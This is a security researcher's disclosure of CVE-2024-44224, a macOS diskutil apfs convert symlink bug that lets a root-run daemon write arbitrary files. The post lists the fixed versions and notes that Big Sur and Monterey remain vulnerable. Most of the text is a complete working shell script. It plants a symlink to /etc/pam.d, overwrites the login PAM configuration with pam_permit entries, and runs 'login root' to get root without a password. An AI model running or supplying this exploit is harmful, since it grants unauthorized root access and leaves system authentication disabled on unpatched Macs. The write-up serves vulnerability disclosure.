When running diskutil apfs convert with -prebootSource, legacy macOS boot files are copied to a "staging" folder for the new Preboot volume. This follows symlinks and can be tricked into writing outside the staging folder.
The copying is done by diskmanagementd, which runs as root, turning a minor bug into an arbitrary file write exploit. This can easily escalate privileges.
After reporting this in September 2024, I received an Apple Security Bounty, and the bug was fixed in macOS 13.7.2, macOS 14.7.2, and macOS 15.2:
Impact: A malicious app may be able to gain root privileges
Description: A permissions issue was addressed with additional restrictions.
CVE-2024-44224: Amy (@asentientbot)
Big Sur and Monterey are still vulnerable.
Once again, emma (916253) and ASentientHedgehog helped test.
They're also really cool in general, please go follow them.
The following shell script will login as root on affected versions.
wholeDevice="$(hdiutil attach -nomount ram://10000000 | grep -E -o 'disk[0-9]+')"
mainName="$(mktemp -u evilXXXXX)"
bootName="$(mktemp -u bootXXXXX)"
diskutil partitiondisk "$wholeDevice" gpt jhfs+ "$mainName" 1g %Apple_Boot% %noformat% r
mainDevice="${wholeDevice}s2"
bootDevice="${wholeDevice}s3"
newfs_hfs -v "$bootName" "$bootDevice"
diskutil mount "$bootDevice"
bugInput="/Volumes/$bootName/com.apple.boot.R/System/Library/Caches/com.apple.corestorage/EFILoginLocalizations"
bugOutput="/Volumes/$mainName/staging/System/Library/Caches/com.apple.corestorage/EFILoginLocalizations"
mkdir -p "$bugInput"
mkdir -p "$(dirname "$bugOutput")"
echo 'auth sufficient pam_permit.so
account sufficient pam_permit.so
session sufficient pam_permit.so' > "$bugInput/login"
ln -s /etc/pam.d "$bugOutput"
diskutil apfs convert "$mainDevice" -prebootSource "/Volumes/$mainName/staging"
login root